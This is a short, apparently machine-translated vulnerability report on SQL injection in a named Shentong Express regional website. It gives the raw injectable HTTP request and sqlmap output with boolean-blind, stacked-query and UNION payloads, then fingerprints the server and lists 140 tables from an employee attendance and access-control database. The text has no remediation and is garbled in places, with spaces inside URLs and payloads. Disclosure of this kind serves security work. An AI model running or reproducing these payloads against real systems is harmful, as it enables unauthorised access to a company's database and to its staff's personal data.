SQL injection vulnerability in a substation of Shentong express
SQL injection vulnerability in a site of Shentong express
GET/Dot. asp? Area =-1 'OR 1 = 1 * -- HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.gdsto.com.cn/
Cookie: ASPSESSIONIDACBDCSSA = GANBFHOBEOMPODKONKIGHILO; ASPSESSIONIDACBADSTA = AHOJCDLCAKCKFIILHAAPCHIB
Host: www.gdsto.com.cn
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept :*/*
Code Region
Sqlmap resumed the following injection point (s) from stored session:
---
Parameter: #1 * (URI)
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: http://www.gdsto.com.cn: 80/Dot. asp? Area =-1 'OR 1 = 1 AND 6075 = 6075 --
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: http://www.gdsto.com.cn: 80/Dot. asp? Area =-1 'OR 1 = 1; waitfor delay '0: 0: 5 '----
Type: UNION query
Title: Generic UNION query (NULL)-10 columns
Payload: http://www.gdsto.com.cn: 80/Dot. asp? Area =-1 'OR 1 = 1 union all select null, NULL, CHAR (113) + CHAR (106) + CHAR (113) + CHAR (120) + CHAR (113) + CHAR (66) + CHAR (88) + CHAR (102) + CHAR (76) + CHAR (99) + CHAR (77) + CHAR (116) + CHAR (87) + CHAR (97) + CHAR (97) + CHAR (113) + CHAR (113) + CHAR (122) + CHAR (112) + CHAR (113), NULL, NULL, NULL, NULL ----
---
Web server operating system: Windows 2008 R2 or 7
Web application technology: Microsoft IIS 7.5, ASP
Back-end DBMS: Microsoft SQL Server 2005
Database: zktime_st
[140 tables]
+ ------------------------------ +
| Acc_antiback |
| Acc_device |
| Acc_door |
| Acc_firstopen |
| Acc_firstopen_emp |
| Acc_holidays |
| Acc_interlock |
| Acc_levelset |
| Acc_levelset_door_group |
| Acc_levelset_emp |
| Acc_linkageio |
| Acc_map |
| Acc_mapdoorpos |
| Acc_monitor_log |
| Acc_morecardempgroup |
| Acc_morecardgroup |
| Acc_morecardset |
| Acc_timeseg |
| Acc_wiegandfmt |
| Action_log |
| Areaadmin |
| Att_attreport |
| Att_overtime |
| Att_waitforprocessdata |
| Attcalclog |
| Attexception |
| Attparam |
| Attrecabnormite |
| Attshifts |
| Auth_group |
| Auth_group_permissions |
| Auth_message |
| Auth_permission |
| Auth_user |
| Auth_user_groups |
| Auth_user_user_permissions |
| Base_additiondata |
| Base_appoption |
| Base_basecode |
| Base_datatranslation |
| Base_operatortemplate |
| Base_option |
| Base_personaloption |
| Base_strresource |
| Base_strtranslation |
| Base_systemoption |
| Checkexact |
| Checkinout |
| Dbapp_viewmodel |
| Dbbackuplog |
| Ments |
| Deptadmin |
| Devcmds |
| Devcmds_bak |
| Devlog |
| Django_content_type |
| Django_session |
| Empitemdefine |
| Facetemplate |
| Holidays |
| Iclock |
| Iclock_dininghall |
| Iclock_dstime |
| Iclock_notice |
| Iclock_oplog |
| Iclock_testdata |
| Iclock_testdata_admin_area |
| Iclock_testdata_admin_dept |
| Leaveclass |
| Leaveclass1 |
| Meeting_detailmeeting |
| Meeting_leave |
| Meeting_meetingemp |
| Meeting_meetingentity |
| Meeting_meetingexact |
| Meeting_meetingreport |
| Meeting_originalrecord |
| Meeting_room |
| Meeting_room_devices |
| Meeting_statisticsmeeting |
| Meeting_type |
| Meeting_validrecord |
| Num_run |
| Num_run_deil |
| Operatecmds |
| Personnel_area |
| Personnel_cardtype |
| Personnel_cities |
| Personnel_countries |
| Personnel_education |
| Personnel_empchange |
| Personnel_iccard |
| Personnel_iccard_posmeal |
| Personnel_iccard_use_mechine |
| Personnel_issuecard |
| Personnel_leavelog |
| Personnel_meal |
| Personnel_national |
| Personnel_positions |
| Personnel_state |
| Pos_allowance |
| Pos_allowancesetting |
| Pos_batchtime |
| Pos_carcashsz |
| Pos_carcashszbak |
| Pos_carcashtype |
| Pos_cardmanage |
| Pos_cardserial |
| Pos_errors |
| Pos_handconsume |
| Pos_icconsumerlist |
| Pos_icconsumerlistbak |
| Pos_keydetail |
| Pos_keyvalue |
| Pos_keyvalue_use_mechine |
| Pos_loseunitecard |
| Pos_merchandise |
| Pos_posdevlog |
| Pos_poslog |
| Pos_replenishcard |
| Pos_splittime |
| Pos_splittime_use_mechine |
| Pos_storedetail |
| Pos_timebrush |
| Pos_timedetail |
| Pos_timeslice |
| Posparam |
| Schclass |
| Setuseratt |
| Template |
| User_of_run |
| User_speday |
| User_temp_sch |
| Userinfo |
| Userinfo_attarea |
| Useruusedsclasses |
| Worktable_groupmsg |
| Worktable_instantmsg |
| Worktable_msgtype |
| Worktable_usrmsg |
+ ------------------------------ +